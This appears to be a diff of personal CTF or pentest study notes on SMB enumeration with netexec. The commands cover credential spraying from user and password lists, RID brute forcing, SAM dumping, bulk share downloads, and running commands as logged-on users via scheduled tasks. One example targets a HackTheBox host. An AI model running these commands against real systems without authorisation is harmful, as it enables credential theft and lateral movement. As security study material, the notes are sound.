AndreMIsidoro/escalations/smb_enumeration.md

 	--pass-pol
 	--users
 	--groups

-	-M spider_plus #creates a file tree of the shares
-	-M spider_plus -o DOWNLOAD_FLAG=True # to dump all files

-	To download a specific file we can use smbmap
+	--sam (only local admin?)
+	--rit-brute

+	--loggedon-users

+If there are logged on users whe can try some impersonting scheduling of tasks

+	-M schtask_as -o USER=<loggedon_username> CMD=whoami

 ## Test users

 	netexec smb <target_ip> -u usernames.txt -p passwords.txt --continue-on-success

-## When we have a valid username and password

-Try to rid-brute force

-	netexec smb heist.htb -u 'Guest' -p '' --rid-brute #Guest default password is blank

-This valid user might be the default user 'Guest'

 ## Try local authentication

 Adding --local-auth to any of the authentication commands with attempt to logon locally.

 	nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth

+# File system tree and downloading files

+	-M spider_plus #creates a file tree of the shares
+	-M spider_plus -o DOWNLOAD_FLAG=True # to dump all files

+	To download a specific file we can use smbmap

 ## More netexec enum